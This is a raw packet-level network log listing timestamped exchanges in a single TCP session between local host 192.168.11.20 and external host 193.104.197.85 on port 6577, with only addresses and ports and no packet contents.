Nov 25, 2021 11:28:20.138436079 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.138578892 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.191020012 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.191279888 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.191420078 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.191674948 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.191740990 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.191881895 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.191998959 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.192013979 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.192116976 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.192125082 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.192131996 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.192137957 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.192274094 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.192442894 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.243170023 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.243179083 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.243504047 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.243534088 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.243544102 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.243693113 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.243855000 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.244003057 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.302177906 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.302418947 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.302447081 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.302603006 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.302612066 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.302726984 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.302742004 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.302752018 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.302931070 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.353720903 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.353930950 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.357597113 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.405730963 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.597500086 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.644536972 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.576072931 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.576252937 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.576297998 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.576350927 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.633631945 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.633903980 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.634016991 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.634080887 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.634114027 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.634145021 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.634202003 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.634368896 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.678175926 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.678395987 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.690469027 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.690545082 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.690553904 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.690669060 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.690676928 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.690726042 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.690774918 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.690969944 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.738786936 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.739070892 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.743721962 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.743767023 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.743799925 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.743876934 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.744020939 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.744189978 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.798501015 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.798805952 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.798981905 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.799041033 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.799074888 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.799263954 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.799302101 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.799339056 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.799443007 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.799611092 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.850940943 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.851164103 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.851198912 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.851285934 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.851300001 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.851368904 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.851535082 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.851553917 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.851763010 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.851779938 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.851793051 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.852046967 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.852063894 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.852179050 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.904186964 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.904258013 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.904297113 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.904325962 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.904391050 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.904567957 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.904584885 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.904732943 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.904901028 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.961323023 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.961369991 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.961404085 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.961435080 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.961466074 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.961498022 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:21.961538076 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.961704969 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:21.961863041 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.029948950 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.030195951 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.030457973 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.030507088 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.030541897 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.030663013 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.030692101 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.030744076 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.030869007 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.031035900 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.082489967 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.082777023 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.082828045 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.082882881 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.082916021 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.082953930 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.083113909 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.083292961 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.135052919 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.135101080 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.135133982 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.135164976 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.135319948 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.135370970 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.135420084 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.135487080 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.186790943 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.187061071 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.239217997 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.407423973 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.456635952 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.560837984 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.560930967 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.560959101 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.561007977 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.561064005 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.615298986 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.615359068 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.615704060 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.617955923 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.618015051 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.618052006 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.618088007 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.618417025 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.668740034 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.668800116 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.669003010 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.669114113 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.670202971 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.670258045 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.670430899 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.670546055 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.670767069 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.670969009 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.671149015 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.720979929 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.721038103 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.721344948 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.721477985 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.723284006 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.723545074 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.723706007 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.723793983 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.723871946 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.724041939 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.773595095 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.773659945 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.773868084 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.773977041 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.779701948 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.779768944 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.779841900 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.779925108 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.779932022 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.780065060 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.780226946 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.846616983 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.846666098 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.846698046 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.846730947 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.846761942 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.846795082 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.846807003 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.846966028 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.846999884 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.847135067 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.899096012 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.899244070 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.899286032 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.899454117 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.899533987 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.899629116 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.899791956 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.899962902 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.900038004 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.900077105 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.900357008 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.900471926 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.952120066 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.952197075 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.952235937 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.952272892 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.952435017 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.952559948 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:22.952594042 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:22.952893019 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.007479906 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.007658958 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.007675886 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.007793903 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.007950068 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.007992983 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.008068085 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.008127928 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.008157969 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.008193970 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.008322954 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.008361101 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.008487940 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.060379982 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.060455084 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.060487986 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.060520887 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.060553074 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.060650110 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.060724020 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.060832024 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.113167048 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.113215923 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.113248110 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.113280058 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.113311052 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.113451004 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.113568068 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.170123100 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.170181036 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.225987911 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.377204895 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.425304890 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.537220955 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.537430048 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.537478924 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.537529945 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.590681076 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.590740919 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.590784073 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.590821981 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.590868950 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.590876102 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.590939045 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.591027975 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.591197014 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.642858982 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.642923117 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.642956018 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.643043041 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.643076897 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.643246889 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.643357992 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.643383980 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.643394947 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.643652916 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.710953951 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.711011887 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.711044073 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.711075068 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.711105108 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.711136103 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.711302996 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.711410046 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.765294075 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.765364885 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.765403986 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.765450001 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.765484095 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.765491962 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.765654087 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.765822887 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.765889883 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.766109943 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.766284943 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.823045969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.823117018 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.823168039 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.823215008 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.823252916 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.823261976 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.823323965 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.823426962 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.823596954 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.875390053 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.875438929 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.875497103 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.875529051 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.875560045 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.875590086 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.876056910 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.876178026 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.931216955 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.931284904 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.931318998 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.931349993 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.931436062 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.931468010 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.931682110 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.931785107 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.996006966 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.996051073 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.996084929 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.996114969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.996145964 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.996176958 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:23.996751070 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:23.996867895 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.033792019 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.034023046 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.050347090 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.050420046 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.050470114 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.050503969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:24.050543070 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:24.050679922 CET	6577	49806	193.104.197.85	192.168.11.20
